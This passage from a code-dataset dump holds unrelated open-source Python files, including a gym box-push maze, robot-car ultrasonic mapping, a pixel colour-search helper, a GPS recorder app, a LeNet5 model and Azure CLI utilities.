self.rect)","repo_name":"Daniel031000/pacman-unchained2","sub_path":"ghost.py","file_name":"ghost.py","file_ext":"py","file_size_in_byte":3764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"16914753365","text":"import numpy as np\nfrom math import pi\nfrom gym_boxpush.envs.boxpush import *\n\nclass BoxPushMaze(BoxPush):\n\n def reset_state(self):\n self.force_applied = np.asarray([0.0, 0.0])\n\n self.boxes = []\n self.teleporter_pairs = []\n\n self.player = Box(\n x=85,\n y=15,\n width=20,\n height=20,\n mass=100,\n color=(0, 1, 0),\n friction=0.1,\n is_controlled=True,\n bounciness=0\n )\n\n self.player.vel = self.player.vel + [0, 0]\n\n self.boxes.append(self.player)\n\n # Add walls\n self.boxes.append(Box(\n x=0,\n y=50,\n width=10,\n height=100,\n movable=False,\n friction=0.01,\n ))\n self.boxes.append(Box(\n x=100,\n y=50,\n width=10,\n height=100,\n movable=False,\n friction=0.01,\n ))\n self.boxes.append(Box(\n x=50,\n y=0,\n width=100,\n height=10,\n movable=False,\n friction=0.01,\n ))\n self.boxes.append(Box(\n x=50,\n y=100,\n width=100,\n height=10,\n movable=False,\n friction=0.01,\n ))\n\n self.boxes.append(Box(\n x=37.5,\n y=50,\n width=20,\n height=50,\n movable=False,\n friction=0.01,\n ))\n\n self.boxes.append(Box(\n x=5,\n y=62.5,\n width=4,\n height=75,\n movable=False,\n friction=0.01,\n ))\n\n self.boxes.append(Box(\n x=60,\n y=65,\n width=27.5,\n height=20,\n movable=False,\n friction=0.01,\n ))\n\n self.boxes.append(Box(\n x=62.5,\n y=30,\n width=68,\n height=10,\n movable=False,\n friction=0.01,\n ))\n\n def debug_show_player_at_location(self, location_x):\n \"\"\"\n Returns rendering of player at specified location, does not affect actual game state.\n :param location_x: (float -1 to 1) show player at location_x\n :return: \"state_pixels\" rendering with player at location_x\n \"\"\"\n old_center = np.copy(self.player.center)\n self.player.center[0] = (location_x + 1) * 50\n frame = self.render(\"state_pixels\")\n self.player.center = old_center\n return frame\n\n def debug_get_player_location(self):\n return 
(self.player.center[0] - 50) / 50","repo_name":"JBLanier/gym-boxpush","sub_path":"gym_boxpush/envs/boxpushmaze.py","file_name":"boxpushmaze.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74938547021","text":"import picar_4wd as fc\nimport numpy as np\nfrom math import sin, cos, radians, sqrt\n\n#changing print settings to display large arrays\nimport sys\nnp.set_printoptions(suppress=True,linewidth=sys.maxsize,threshold=sys.maxsize)\n\ndef supersonic_scan():\n '''\n This function moves the supersonic sensor 180 degrees\n and records angle & distance tuples into list supersonic_data.\n '''\n #declaring variables\n STEP = 10\n ANGLE_RANGE = 180\n max_angle = ANGLE_RANGE/2\n min_angle = -ANGLE_RANGE/2\n us_step = STEP\n supersonic_data = []\n current_angle = -90\n\n #scanning 180 degrees and returning (angle,distance) tuples as a list called supersonic_data\n for step in range(int(current_angle), int(ANGLE_RANGE/2)+STEP, STEP):\n supersonic_data.append((current_angle,fc.get_distance_at(current_angle)))\n current_angle += us_step\n if current_angle >= max_angle:\n current_angle = max_angle\n us_step = -STEP\n elif current_angle <= min_angle:\n current_angle = min_angle\n us_step = STEP\n return supersonic_data\n\ndef get_coords(car_position, car_direction, angle, distance, scale = 5):\n '''\n Converts polar angle + distance tuples into cartesian coords originating at our car,\n which is located at the bottom center where the angle is measured such that\n -90 degrees is directly to the left of the car and 90 degrees is the right.\n scale will change the scale of the numpy map using floor division rounding, defaulting to 5cm.\n Accounts for direction of the car in relation to the master_map. \n Only works if the car is pointing straight, left or right.\n '''\n x = round((distance // scale) * cos(radians(90-angle)))\n y = round((distance // scale) * sin(radians(90-angle)))\n if cos(radians(car_direction)) == 1:\n return car_position[0]-y, car_position[1]+x\n elif sin(radians(car_direction)) == 1:\n return car_position[0]+x, car_position[1]+y\n elif sin(radians(car_direction)) == -1:\n return car_position[0]-x, car_position[1]-y\n else:\n raise Exception(\"Car turned around!\")\n\ndef cartesian_distance(pta, ptb):\n '''\n Returns the distance between two points given two tuples of coordinates.\n '''\n dist = sqrt((ptb[0]-pta[0])**2 + (ptb[1]-pta[1])**2)\n return dist\n\ndef dda_line(obj1,obj2,grid,threshold=4):\n '''\n Draws '1's in numpy array if two points meet the minimum distance threshhold \n using the digital differential analyzer (dda) Line Generation Algorithm from computer graphics. \n Default threshhold is 4 since the car is roughly 18cm and we are using a 1:5 scale. 
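    Worked example (added for illustration, scale already applied): from obj1=(0,0)
    to obj2=(3,1) the distance is sqrt(10) <= 4, dx=3, dy=1, so steps=3 with
    increments (1.0, 1/3); the loop marks grid cells (1,0), (2,0) and (3,1).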
\n '''\n\n #Checks if objects are closer together than the width of the car then draws the appropriate line\n\n #Creates steps based on whether the two points are further in the X or Y direction\n if 0 < cartesian_distance(obj1,obj2) <= threshold:\n dy = int(obj2[1]-obj1[1])\n dx = int(obj2[0]-obj1[0])\n if 0 < abs(dx) >= abs(dy):\n steps = int(abs(dx))\n elif 0 < abs(dy) > abs(dx):\n steps = int(abs(dy))\n\n #establishes increments and coordinates for each point and initializes list 'coordinates' \n xinc = dx/steps\n yinc = dy/steps\n x = obj1[0]\n y = obj1[1]\n coordinates = []\n i = 0\n\n #appends coordinates to list and adds them to the grid\n while i < steps:\n i += 1\n x = x + xinc\n y = y + yinc\n coordinates.append((x,y))\n for coord in coordinates:\n grid[int(coord[0]),int(coord[1])] = 1\n return grid\n\ndef place_objects(supersonic_data, car_position, car_direction, grid):\n '''\n Supersonic_data is a list of polar coordinate tuples in the form (angle, distance).\n Objects detected in supersonice_data are recorded onto the grid with a '1',\n those close enough to each other will be combined with dda_line. \n '''\n\n\n \n #Option to create grid with car located at bottom center with input variable gridsize\n #grid = np.zeros(gridsize, dtype=np.int32)\n #car_position = (-1,int(grid.shape[1]/2))\n #grid[car_position] = 8 \n\n #Alternative method to create grid based on furthest object detected and car location:\n #furthest = int(max(supersonic_data, key=lambda x:x[1])[1])\n #gridsize = (furthest, furthest+1)\n\n #writing '1's to the grid for recognized data and recording those points in [gridcoords]\n gridcoords = []\n for datum in supersonic_data:\n gridcoords.append(get_coords(car_position,car_direction,*datum))\n grid[get_coords(car_position,car_direction,*datum)] = 1\n \n #using gridcoords to draw lines between close objects on the grid\n for i in range(1,len(gridcoords)):\n dda_line(gridcoords[i-1],gridcoords[i],grid)\n \n return grid\n'''\nTest Example:\nif __name__ == \"__main__\":\n grid = np.zeros((50,51), dtype=np.int32)\n car_position = (-1,int(grid.shape[1]/2))\n grid[car_position] = 8\n supersonic_data = supersonic_scan()\n print(place_objects(supersonic_data, car_position,0,grid))\n\n'''\n","repo_name":"jzhan2543/iot-lab1","sub_path":"numpymap.py","file_name":"numpymap.py","file_ext":"py","file_size_in_byte":5123,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"40473394223","text":"from mpi4py import MPI\nfrom mpishuffler import shuffle\n\n\ndef load_super_huge_data():\n return [\"apple\", \"banana\", \"dekopon\"]\n\n\ndef main():\n comm = MPI.COMM_WORLD\n rank = comm.Get_rank()\n local_data = []\n if rank == 0:\n local_data = load_super_huge_data()\n received_payload = []\n shuffle(local_data, received_payload, comm)\n print(f\"rank {rank} reveived {received_payload}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"undertherain/mpishuffler","sub_path":"example/simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73970268302","text":"from PIL import Image\n\n\nclass himagesearch:\n def __init__(self, image: Image):\n self.image = image\n pass\n def findMultiColorInRegionFuzzy(self, color, color_positions, degree, x1, y1, x2, y2):\n degree = 100 - degree\n # Load the image\n # image = Image.open(r\"C:\\Users\\Admin\\Pictures\\Screenshots\\Capture.PNG\")\n image = 
self.image\n # Convert the color to RGB\n r = (color & 0xFF0000) >> 16\n g = (color & 0x00FF00) >> 8\n b = (color & 0x0000FF)\n color_rgb = (r, g, b)\n color_positions = color_positions.split(\",\")\n # Loop through the region of the image\n for y in range(y1, y2):\n for x in range(x1, x2):\n # Get the color at the current position\n current_color = image.getpixel((x, y))\n if len(current_color) == 4: # PNG image\n current_color = current_color[:3] # Ignore the alpha channel\n # Check if the current color matches the reference color\n if current_color == color_rgb:\n\n # Check if the colors around the current position match\n lis = []\n lis2 = []\n for pos in color_positions:\n dx, dy, ref_color = pos.split(\"|\")\n dx = int(dx)\n dy = int(dy)\n r = (int(ref_color, 16) & 0xFF0000) >> 16\n g = (int(ref_color, 16) & 0x00FF00) >> 8\n b = (int(ref_color, 16) & 0x0000FF)\n ref_color_rgb = (r, g, b)\n newx = x + dx\n newy = y + dy\n # Get the color at the position around the current position\n if newx <= 0 or newy <= 0:\n lis.append(\"False\")\n break\n around_color = image.getpixel((newx, newy))\n\n # Check if the color around the current position matches the reference color with the specified degree of fuzziness\n if (around_color[0] >= ref_color_rgb[0] - degree and around_color[0] <= ref_color_rgb[0] + degree\n and around_color[1] >= ref_color_rgb[1] - degree and around_color[1] <= ref_color_rgb[1] + degree\n and around_color[2] >= ref_color_rgb[2] - degree and around_color[2] <= ref_color_rgb[2] + degree):\n # hex_color_code = '0x{:02X}{:02X}{:02X}'.format(around_color[0],around_color[1],around_color[2])\n # lis2.append((newx, newy, hex_color_code))\n lis.append(\"True\")\n else:\n lis.append(\"False\")\n break\n if \"False\" in lis:\n continue\n # print(lis2)\n return x, y\n\n return (0,0)\n\nfrom hwin import *\nexe = r\"C:\\Program Files\\Privax\\HMA VPN\\VyprVPN.exe\"\nif not hfile.checkExists(exe):\n exe = r\"C:\\Program Files (x86)\\HMA VPN\\VyprVPN.exe\"\nnameexe = hfile.getFilenameWithoutExtension(exe)\nhwnd = None\npids = hwin.getPidsOfProcess(nameexe)\n\nfor pid in pids:\n if hwnd:\n break\n hwnds = hwin.getHandlesByPid(pid)\n size = None\n if len(hwnds) == 1:\n hwnd = hwnds[0]\n else:\n for i in hwnds:\n isize = hwin.getClientSizeByHandle(i)\n if isize[1] == 570:\n hwnd = i\n size = isize\n break\nimage = hwin.captureHandle(hwnd)\nimage.save(r\"C:\\Users\\Admin\\Pictures\\Screenshots\\abc.png\")\nhi = himagesearch(image)\n# x,y = findMultiColorInRegionFuzzy( 0x472814, \"-335|-221|0xefa037,-435|-465|0xfff3c3,10|-473|0xfae474,238|-449|0xfceb5f,39|-216|0xcb6b04,-310|-64|0x7f6669,-491|10|0x663a2d,-136|65|0x553c38,-344|-256|0xfbaa27\", 90, 0, 0, 1023, 575)\nfindMultiColorInRegionFuzzy = hi.findMultiColorInRegionFuzzy\nx,y = findMultiColorInRegionFuzzy( 0x6f767c, \"6|7|0x6f767c,-12|-79|0x12a1fc,-194|-74|0x0978fb,-150|-374|0xc1c1c1,-132|-436|0xd6d6d6\", 90, 0, 0, 375, 606)\n\nprint(x,y)\n","repo_name":"emga9xkc2/check-mail-gmx-private","sub_path":"t3.py","file_name":"t3.py","file_ext":"py","file_size_in_byte":4218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"13227573126","text":"def liveblog_order(request):\n valid_orders = {'asc': '-pub_date',\n 'desc': 'pub_date', }\n order = valid_orders['asc'] # default\n if request.GET:\n if request.GET.has_key('order'):\n selected_order = request.GET['order']\n if selected_order in valid_orders.keys():\n order = valid_orders[selected_order]\n return {'liveblog_order': order, 
}\n","repo_name":"bycoffe/django-liveblog","sub_path":"context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"2127667495","text":"from setuptools import setup, find_namespace_packages\n\ninstall_requires = [\n 'GitPython', 'tensorboardX', 'matplotlib', 'wandb', 'fabric', 'cloudpickle'\n]\n\nsetup(\n name='mila_tools',\n version='0.0.1',\n packages=[\"mila_tools\", \"slurm_scripts\"],\n package_data={'': ['*.sh']},\n url='github.com/manuel-delverme/mila_tools/',\n license='',\n author='Manuel Del Verme',\n author_email='',\n description='',\n install_requires=install_requires,\n)\n","repo_name":"manuel-delverme/mila_tools","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"47"} +{"seq_id":"41423324606","text":"#\\input texinfo\n#coding: utf-8\n\n# Put your script (and all resources that it needs for running) in this folder.\n# The filename of the main script should be \"main.py\".\n\nimport ui, location, dialogs, time, console, math, urllib, requests, console\nstop = True\nlastloc = None\ncurloc = None\ndebug = False\n\n\n\n\n\nview = ui.View()\nview=ui.View()\nview.frame = (0, 0, 320, 430)\nview.name = 'GPS RECORDER'\nview.enabled = True\nview.tint_color = (0.000000,0.478000,1.000000,1.000000)\nview.border_color = (0.000000,0.000000,0.000000,1.000000)\nview.background_color = (1.000000,1.000000,1.000000,1.000000)\nview.flex = 'LR'\n\n\n\n\n\n# start the GPS in the device.\n# want this was a button because running the gps uses a lot of battery life\n\ndef button_startgps(sender):\n location.start_updates()\n\n\n if location.is_authorized():\n location.start_updates()\n dialogs.hud_alert('GPS Started', 'success', 1)\n else:\n dialogs.alert('App not authorized to use GPS. Enable GPS in system preferences.', 'Plz fix', 'Oh rats... 
gonna fix that now', hide_cancel_button=True)\n\n\ndef clear(sender):\n console.clear()\n\n# allow user to stop the gps receiver to save battery\ndef button_stopgps(sender):\n location.stop_updates()\n dialogs.hud_alert('GPS stopped','success', 1)\n\n# print the current location\ndef button_print_pos(sender):\n global debug, v\n debug = not debug\n\n if debug:\n v['button_position'].background_color = 'white'\n v['button_position'].title='Turn Debug Off'\n else:\n v['button_position'].background_color = 'white'\n v['button_position'].title='Turn Debug On'\n\n# record the gps signal to a file and warn if the accuracy is poor\ndef button_record(sender):\n # code here\n global curloc, lastloc\n lastloc=curloc\n curloc = location.get_location()\n name=dialogs.input_alert(\"Enter Name\", \"Name:\",\"John Doe\", hide_cancel_button=False)\n curloc = location.get_location()\n if curloc['horizontal_accuracy']>5:\n dialogs.hud_alert(\"Poor GPS accuracy\", 'error', 1)\n count=0\n while count<10 and curloc[\"horizontal_accuracy\"]>5:\n curloc=location.get_location()\n count+=1\n dialogs.hud_alert('Location Recorded', 'success', 1)\n else:\n dialogs.hud_alert('Location Recorded', 'success', 1)\n\n\n form_url = 'https://docs.google.com/forms/d/e/1FAIpQLSeYmR_PSpxeeE1pJEP83Ui_eqz4OA6tqqx35cfPX1VL2mfd0g/formResponse'\n\n form_postbody = {'entry.598678340':str(curloc['longitude']), 'entry.1352477612':str(curloc['latitude']), 'entry.1482071151':str(curloc['horizontal_accuracy']), 'entry.1391268977':urllib.parse.quote(str(name)), 'draftResponse':[], 'pageHistory':0}\n\n form_headers = {'Referer':'https://docs.google.com/forms/d/e/1FAIpQLSeYmR_PSpxeeE1pJEP83Ui_eqz4OA6tqqx35cfPX1VL2mfd0g/viewform'}\n\n try:\n val = requests.post(form_url, data=form_postbody, headers=form_headers)\n except:\n console.hud_alert('Error on upload', 'failure', 1)\n\n\n# stop the program WORKS\ndef button_stop(sender):\n global stop\n #alertval = dialogs.alert('Press cancel to stop', '', '', 'Keep Going', hide_cancel_button=True)\n stop=False\n\n\ndef gpsdistance(lat1, lng1, lat2, lng2):\n #return distance as meter if you want km distance, remove \"* 1000\"\n radius = 6371 * 1000\n\n dLat = (lat2-lat1) * math.pi / 180\n dLng = (lng2-lng1) * math.pi / 180\n\n lat1 = lat1 * math.pi / 180\n lat2 = lat2 * math.pi / 180\n\n val = math.sin(dLat/2) * math.sin(dLat/2) + math.sin(dLng/2) * math.sin(dLng/2) * math.cos(lat1) * math.cos(lat2)\n ang = 2 * math.atan2(math.sqrt(val), math.sqrt(1-val))\n return radius * ang\n\n\n\nrecord_button = ui.Button()\nrecord_button.frame = (74, 155, 180, 180)\nrecord_button.flex = 'LR'\nrecord_button.corner_radius = 90\nrecord_button.background_color = (0.000000,0.742925,0.000000,1.000000)\nrecord_button.border_color = (1.000000,0.000000,0.000000,1.000000)\nrecord_button.border_width = 5\nrecord_button.title = 'RECORD'\nrecord_button.action = button_record\nrecord_button.font_bold = True\nrecord_button.name = 'record_button'\nrecord_button.font_size = 30\n\ndist_label = ui.Label()\ndist_label.frame = (74, 57, 180, 70)\ndist_label.font_size = 18\ndist_label.corner_radius = 10\ndist_label.number_of_lines = 2\ndist_label.border_width = 2\ndist_label.alignment = ui.ALIGN_CENTER\ndist_label.text = 'Feet Since Last Measurement'\ndist_label.font_name = ''\ndist_label.name = 'distance'\ndist_label.flex = 'LR'\n\n\nstartgps_button = ui.Button()\nstartgps_button.frame = (22, 356, 131, 50)\nstartgps_button.font_size = 15\nstartgps_button.corner_radius = 17\nstartgps_button.background_color = 
(0.563837,0.768868,0.563837,1.000000)\nstartgps_button.border_width = 0\nstartgps_button.title = 'Start GPS'\nstartgps_button.action = button_startgps\nstartgps_button.alpha = 1\nstartgps_button.font_bold = True\nstartgps_button.name = 'startgps'\nstartgps_button.flex = 'LR'\n\n\n\nstopgps_button = ui.Button()\nstopgps_button.frame = (174, 356, 131, 50)\nstopgps_button.font_size = 15\nstopgps_button.corner_radius = 17\nstopgps_button.background_color = (1.000000,0.633333,0.633333,1.000000)\nstopgps_button.border_width = 0\nstopgps_button.title = 'Stop GPS'\nstopgps_button.action = button_stopgps\nstopgps_button.alpha = 1\nstopgps_button.font_bold = True\nstopgps_button.name = 'stopgps'\nstopgps_button.flex = 'LR'\n\n\nstop_button = ui.Button()\nstop_button.frame = (174, 424, 114, 50)\nstop_button.border_width = 0\nstop_button.flex = 'LR'\nstop_button.action = button_stop\nstop_button.title = 'STOP'\nstop_button.corner_radius = 10\nstop_button.background_color = (1.000000,0.000000,0.000000,1.000000)\nstop_button.name = 'button_stop'\nstop_button.font_size = 36\n\nstop_button_2 = ui.Button()\nstop_button_2.frame = (39, 424, 114, 50)\nstop_button_2.border_width = 0\nstop_button_2.action = clear\nstop_button_2.title = 'CLEAR'\nstop_button_2.corner_radius = 10\nstop_button_2.background_color = (1.000000,0.000000,0.000000,1.000000)\nstop_button_2.name = 'button_stop'\nstop_button_2.font_size = 36\n\n\n\ndebug_button = ui.Button()\ndebug_button.frame = (97, 6, 127, 50)\ndebug_button.border_width = 0\ndebug_button.action = button_print_pos\ndebug_button.title = 'Debug Mode'\ndebug_button.corner_radius = 10\ndebug_button.background_color = (1.000000,1.000000,1.000000,1.000000)\ndebug_button.name = 'button_position'\ndebug_button.font_size = 18\n\n\n\n\n\n\n# Attach the widgets defined above to the root view and present it (reconstructed\n# from the commented-out ui.load_view()/present() lines that used to sit here;\n# without this, the v[...] lookups below fail).\nfor subview in (record_button, dist_label, startgps_button, stopgps_button,\n                stop_button, stop_button_2, debug_button):\n    view.add_subview(subview)\nv = view\nview.present('Full_Screen', hide_title_bar=False, animated=False)\n\nrecbutton = v['record_button']\ndistance = v['distance']\n\nlastloc=location.get_location()\n\n# main loop\n# repeatedly get a new location and show\n# the user if the gps is accurate enough\n# yay the break works\nwhile stop:\n    if not stop:\n        console.hud_alert('Stopped!')\n        break\n    curloc = location.get_location()\n    accuracy=curloc['horizontal_accuracy']\n\n    if accuracy>5:\n        recbutton.background_color='red'\n    else:\n        recbutton.background_color='green'\n\n    curlong=curloc['longitude']\n    curlat=curloc['latitude']\n    lastlong=lastloc['longitude']\n    lastlat=lastloc['latitude']\n\n    distance.text = 'Distance since last record: ' + str(round(gpsdistance(lastlat,lastlong, curlat, curlong))) + ' meters'\n\n    if debug:\n        console.alert(str(curloc), \"\", \"OK\", hide_cancel_button=True)\n\n        console.alert(str('Position: '+str(curloc['latitude'])+' '+str(curloc['longitude'])), \"\", \"OK\", hide_cancel_button=True)\n\n        console.alert(str('Distance since last record: ' + str(gpsdistance(lastlat,lastlong, curlat, curlong)) + ' meters'), \"\", \"OK\", hide_cancel_button=True)\n\n    time.sleep(5)\n","repo_name":"b-j-m/GPS-Recorder","sub_path":"GPSRecorderApp.py","file_name":"GPSRecorderApp.py","file_ext":"py","file_size_in_byte":7424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"12221634175","text":"import torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\n\nclass LeNet5(nn.Module):\n    \"\"\"\n    for cifar10 dataset.\n    \"\"\"\n\n    def __init__(self):\n        super(LeNet5, self).__init__()\n\n        self.conv_unit = nn.Sequential(\n            # x: [b,3,32,32] -> [b,6,28,28]\n            nn.Conv2d(3, 6, kernel_size=5, stride=1, 
padding=0),\n nn.AvgPool2d(kernel_size=2, stride=2, padding=0),\n #\n nn.Conv2d(6, 16, kernel_size=5, stride=1, padding=0),\n nn.AvgPool2d(kernel_size=2, stride=2, padding=0),\n\n )\n\n # flatten\n # fc unit\n self.fc_unit = nn.Sequential(\n nn.Linear(16 * 5 * 5, 120),\n nn.ReLU(),\n nn.Linear(120, 84),\n nn.ReLU(),\n nn.Linear(84, 10)\n )\n\n def forward(self, x):\n \"\"\"\n :param x: [b,3,32,32]\n :return:\n \"\"\"\n batch_size = x.size(0) # size(0)返回[b,3,32,32]的b\n # [b,3,32,32] -> [b,16,5,5]\n x = self.conv_unit(x)\n # [b,16,5,5] -> [b,16*6*6] Flatten\n x = x.view(batch_size, 16 * 5 * 5)\n # [b,16*5*5] -> [b,10]\n logits = self.fc_unit(x)\n\n return logits\n\n\ndef main():\n net = LeNet5()\n temp = torch.randn(2, 3, 32, 32)\n out = net(temp)\n print('LeNet5 out: ', out.shape)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"zhuozhudd/PyTorch-Course-Note","sub_path":"ch08_CIFAR10_ResNet/LeNet5.py","file_name":"LeNet5.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"47"} +{"seq_id":"17779440566","text":"import subprocess\nimport time\n\nfrom azure.cli.core.azclierror import UnclassifiedUserFault\n\nfrom .spinner import Spinner\nfrom .logger import logger, is_verbose\n\n\ndef run_shell_command(command, combine_std=True):\n # if --verbose, don't capture stderr\n stderr = None\n if combine_std:\n stderr = None if is_verbose() else subprocess.STDOUT\n output = subprocess.check_output(command, universal_newlines=True, stderr=stderr)\n logger.info(\"%s returned:\\n%s\", \" \".join(command), output)\n return output\n\n\ndef message_variants(template_msg):\n # Find the first word and assume it's a capitalized verb.\n verb, predicate = template_msg.split(\" \", 1)\n begin_msg = f\"{verb[:-1]}ing {predicate}\" if verb.endswith(\"e\") else f\"{verb}ing {predicate}\"\n end_msg = f\"✓ {verb}d {predicate}\" if verb.endswith(\"e\") else f\"✓ {verb}ed {predicate}\"\n error_msg = f\"✗ Failed to {verb.lower()} {predicate}\"\n return begin_msg, end_msg, error_msg\n\n\ndef try_command_with_spinner(cmd, command, spinner_msg, include_error_stdout=False):\n begin_msg, end_msg, err_msg = message_variants(spinner_msg)\n with Spinner(cmd, begin_msg, end_msg):\n try:\n run_shell_command(command)\n except (subprocess.CalledProcessError, FileNotFoundError) as err:\n if include_error_stdout:\n err_msg += f\"\\n{err.stdout}\"\n raise UnclassifiedUserFault(err_msg) from err\n\n\ndef retry_shell_command(command, attempts=100, delay=3):\n \"\"\"Run a shell command, retrying a number of times with a specified delay if it fails.\"\"\"\n output = \"\"\n for i in range(attempts):\n try:\n output = run_shell_command(command)\n break\n except subprocess.CalledProcessError as err:\n logger.info(err)\n if i == attempts - 1:\n raise\n time.sleep(delay)\n return output\n","repo_name":"Azure/azure-capi-cli-extension","sub_path":"src/capi/azext_capi/helpers/run_command.py","file_name":"run_command.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"47"} +{"seq_id":"24941105575","text":"from __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport argparse\nimport cmd\nfrom datetime import datetime\nimport os\nimport stat\nimport sys\n\nfrom azure.datalake.store.core import AzureDLFileSystem\nfrom azure.datalake.store.multithread import ADLDownloader, ADLUploader\nfrom azure.datalake.store.utils import 
write_stdout\n\n\nclass AzureDataLakeFSCommand(cmd.Cmd, object):\n \"\"\"Accept commands via an interactive prompt or the command line.\"\"\"\n\n prompt = 'azure> '\n undoc_header = None\n _hidden_methods = ('do_EOF',)\n\n def __init__(self, fs):\n super(AzureDataLakeFSCommand, self).__init__()\n self._fs = fs\n\n def get_names(self):\n return [n for n in dir(self.__class__) if n not in self._hidden_methods]\n\n def do_close(self, line):\n return True\n\n def help_close(self):\n print(\"close\\n\")\n print(\"Exit the application\")\n\n def do_cat(self, line):\n parser = argparse.ArgumentParser(prog=\"cat\", add_help=False)\n parser.add_argument('files', type=str, nargs='+')\n args = parser.parse_args(line.split())\n\n for f in args.files:\n write_stdout(self._fs.cat(f))\n\n def help_cat(self):\n print(\"cat file ...\\n\")\n print(\"Display contents of files\")\n\n def do_chgrp(self, line):\n parser = argparse.ArgumentParser(prog=\"chgrp\", add_help=False)\n parser.add_argument('group', type=str)\n parser.add_argument('files', type=str, nargs='+')\n args = parser.parse_args(line.split())\n\n for f in args.files:\n self._fs.chown(f, group=args.group)\n\n def help_chgrp(self):\n print(\"chgrp group file ...\\n\")\n print(\"Change file group\")\n\n def do_chmod(self, line):\n parser = argparse.ArgumentParser(prog=\"chmod\", add_help=False)\n parser.add_argument('mode', type=str)\n parser.add_argument('files', type=str, nargs='+')\n args = parser.parse_args(line.split())\n\n for f in args.files:\n self._fs.chmod(f, args.mode)\n\n def help_chmod(self):\n print(\"chmod mode file ...\\n\")\n print(\"Change file permissions\")\n\n def _parse_ownership(self, ownership):\n if ':' in ownership:\n owner, group = ownership.split(':')\n if not owner:\n owner = None\n else:\n owner = ownership\n group = None\n return owner, group\n\n def do_chown(self, line):\n parser = argparse.ArgumentParser(prog=\"chown\", add_help=False)\n parser.add_argument('ownership', type=str)\n parser.add_argument('files', type=str, nargs='+')\n args = parser.parse_args(line.split())\n\n owner, group = self._parse_ownership(args.ownership)\n\n for f in args.files:\n self._fs.chown(f, owner=owner, group=group)\n\n def help_chown(self):\n print(\"chown owner[:group] file ...\")\n print(\"chown :group file ...\\n\")\n print(\"Change file owner and group\")\n\n def _display_dict(self, d):\n width = max([len(k) for k in d.keys()])\n for k, v in sorted(list(d.items())):\n print(\"{0:{width}} = {1}\".format(k, v, width=width))\n\n def do_df(self, line):\n parser = argparse.ArgumentParser(prog=\"df\", add_help=False)\n parser.add_argument('path', type=str, nargs='?', default='.')\n args = parser.parse_args(line.split())\n\n self._display_dict(self._fs.df(args.path))\n\n def help_df(self):\n print(\"df [path]\\n\")\n print(\"Display Azure account statistics of a path\")\n\n def _truncate(self, num, fmt):\n return '{:{fmt}}'.format(num, fmt=fmt).rstrip('0').rstrip('.')\n\n def _format_size(self, num):\n for unit in ['B', 'K', 'M', 'G', 'T']:\n if abs(num) < 1024.0:\n return '{:>4s}{}'.format(self._truncate(num, '3.1f'), unit)\n num /= 1024.0\n return self._truncate(num, '.1f') + 'P'\n\n def _display_path_with_size(self, name, size, human_readable):\n if human_readable:\n print(\"{:7s} {}\".format(self._format_size(size), name))\n else:\n print(\"{:<9d} {}\".format(size, name))\n\n def do_du(self, line):\n parser = argparse.ArgumentParser(prog=\"du\", add_help=False)\n parser.add_argument('files', type=str, nargs='*', default=[''])\n 
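        # Added note: the flags below mirror coreutils du -- -c adds a grand total
        # line, -h prints human-readable sizes (B/K/M/G/T via _format_size), and
        # -r walks subdirectories by passing deep=True to AzureDLFileSystem.du.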
parser.add_argument('-c', '--total', action='store_true')\n parser.add_argument('-h', '--human-readable', action='store_true')\n parser.add_argument('-r', '--recursive', action='store_true')\n args = parser.parse_args(line.split())\n\n total = 0\n for f in args.files:\n items = sorted(list(self._fs.du(f, deep=args.recursive).items()))\n for name, size in items:\n total += size\n self._display_path_with_size(name, size, args.human_readable)\n if args.total:\n self._display_path_with_size(\"total\", total, args.human_readable)\n\n def help_du(self):\n print(\"du [-c | --total] [-r | --recursive] [-h | --human-readable] [file ...]\\n\")\n print(\"Display disk usage statistics\")\n\n def do_exists(self, line):\n parser = argparse.ArgumentParser(prog=\"exists\", add_help=False)\n parser.add_argument('file', type=str)\n args = parser.parse_args(line.split())\n\n print(self._fs.exists(args.file, invalidate_cache=False))\n\n def help_exists(self):\n print(\"exists file\\n\")\n print(\"Check if file/directory exists\")\n\n def do_get(self, line):\n parser = argparse.ArgumentParser(prog=\"get\", add_help=False)\n parser.add_argument('remote_path', type=str)\n parser.add_argument('local_path', type=str, nargs='?', default='.')\n parser.add_argument('-b', '--chunksize', type=int, default=2**28)\n parser.add_argument('-c', '--threads', type=int, default=None)\n parser.add_argument('-f', '--force', action='store_true')\n args = parser.parse_args(line.split())\n\n ADLDownloader(self._fs, args.remote_path, args.local_path,\n nthreads=args.threads, chunksize=args.chunksize,\n overwrite=args.force)\n\n def help_get(self):\n print(\"get [option]... remote-path [local-path]\\n\")\n print(\"Retrieve the remote path and store it locally\\n\")\n print(\"Options:\")\n print(\" -b \")\n print(\" --chunksize \")\n print(\" Set size of chunk to retrieve atomically, in bytes.\\n\")\n print(\" -c \")\n print(\" --threads \")\n print(\" Set number of multiple requests to perform at a time.\")\n print(\" -f\")\n print(\" --force\")\n print(\" Overwrite an existing file or directory.\")\n\n def do_head(self, line):\n parser = argparse.ArgumentParser(prog=\"head\", add_help=False)\n parser.add_argument('files', type=str, nargs='+')\n parser.add_argument('-c', '--bytes', type=int, default=1024)\n args = parser.parse_args(line.split())\n\n for f in args.files:\n 